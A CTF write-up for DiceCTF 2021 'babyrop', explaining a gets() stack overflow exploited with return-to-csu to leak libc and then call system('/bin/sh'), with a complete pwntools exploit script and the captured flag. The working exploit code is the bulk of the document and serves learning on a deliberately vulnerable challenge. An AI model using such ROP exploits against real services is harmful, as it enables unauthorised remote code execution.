[DiceCTF 2021] babyrop (CTF/WRITEUP, 2021. 2. 6. 12:59)
Disassembly

```c
undefined8 main(void) {
    char *s;
    write(1, "Your name: ", 0xb);
    gets(&s);
    return 0;
}
```

gets() reads without any length limit, so the input overflows the stack buffer and overwrites the saved return address.
Return-to-csu
Use return-to-csu (RTC) to leak a libc address: the gadgets in __libc_csu_init let us call write(1, &GOT_entry, 8) with fully controlled rdi/rsi/rdx, so the libc address of write (the GOT entry of gets would serve equally well) is printed back to us.
From the leaked address, identify the libc version, compute the addresses of system and the "/bin/sh" string, and call system("/bin/sh") to solve the challenge.
Code
```python
from pwn import *

binary = "./babyrop"
lib = "./libc6_2.31-0ubuntu9.2_amd64.so"   # libc identified from the leaked write address
server = "dicec.tf"
port = 31924

# context.log_level = 'debug'
context.binary = binary

if True:
    p = remote(server, port)
else:
    p = process(binary)
    gdb.attach(p)

e = ELF(binary)
r = ROP(e)
l = ELF(lib)
e.checksec()

main = e.symbols["main"]
gets_got = e.got["gets"]
write_got = e.got["write"]
csu_init = 0x4011ca   # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
csu = 0x4011b0        # mov rdx, r14; mov rsi, r13; mov edi, r12d; call [r15+rbx*8]
prdi = (r.find_gadget(['pop rdi', 'ret']))[0]
ret = (r.find_gadget(['ret']))[0]
bss = e.bss() + 0x100

# Stage 1: write(1, write_got, 8) via return-to-csu, then return to main.
payload = b"\x90" * 0x48                    # 0x48 bytes up to the saved return address
payload += p64(csu_init)
payload += p64(0) + p64(1) + p64(1) + p64(write_got) + p64(0x8) + p64(write_got)
#          rbx     rbp     r12=fd   r13=buf          r14=len    r15=&write
payload += p64(csu)
payload += p64(0) * 7                       # add rsp, 8 plus six pops after the call
payload += p64(main)
p.recvuntil(b"Your name: ")
p.sendline(payload)

write = u64(p.recvn(8))                     # recvn: recv(8) may return fewer than 8 bytes
log.info("write : " + hex(write))
libc = write - l.symbols["write"]
log.info("libc : " + hex(libc))
system = libc + l.symbols["system"]
binsh = libc + next(l.search(b"/bin/sh\x00"))

# Stage 2: system("/bin/sh"); the extra ret keeps rsp 16-byte aligned for system().
payload = b"\x90" * 0x48
payload += p64(ret)
payload += p64(prdi)
payload += p64(binsh)
payload += p64(system)
p.recvuntil(b"Your name: ")
p.sendline(payload)
p.interactive()
```
Flag
dice{so_let's_just_pretend_rop_between_you_and_me_was_never_meant_b1b585695bdd0bcf2d144b4b}